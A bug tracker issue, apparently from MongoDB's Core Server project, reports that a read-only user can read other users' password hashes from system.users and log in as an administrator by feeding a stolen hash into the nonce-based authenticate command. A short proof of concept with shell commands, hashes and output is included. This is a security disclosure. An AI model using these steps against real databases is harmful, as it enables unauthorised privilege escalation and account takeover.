Uploaded image for project: 'Core Server'
  1. Core Server
  2. SERVER-6031

read only user can get write priority

    XMLWordPrintable

Details

    • Bug
    • Status: Closed
    • Critical - P2
    • Resolution: Duplicate
    • None
    • None
    • Security
    • None
    • all
    • ALL

    Description

      read only user can get write priority by access other users's pwd hash

      sample:
      > db.system.users.find()

      { "_id" : ObjectId("4fd068ae34ae311cd063f9b2"), "user" : "sa", "readOnly" : false, "pwd" : "84c689ded211fb631fd5f5dedc5d4539" } { "_id" : ObjectId("4fd07496cf5f726c2428ac3a"), "user" : "ro", "readOnly" : true, "pwd" : "d8883d4475561e209dda05a54a98c8f6" }

      > db.$cmd.findOne(

      {getnonce:1}

      )

      { "nonce" : "9892be9572e9851e", "ok" : 1 }

      > db.runCommand(

      { authenticate : 1, user : "sa", nonce : "9892be9572e9851e", key : hex_md5("9892be9572e9851e"+"sa"+"84c689ded211fb631fd5f5dedc5d4539") }

      )

      { "ok" : 1 }

      Attachments

        Issue Links

          Activity

            People

              Unassigned Unassigned
              syre xie zhenye
              Votes:
              0 Vote for this issue
              Watchers:
              4 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: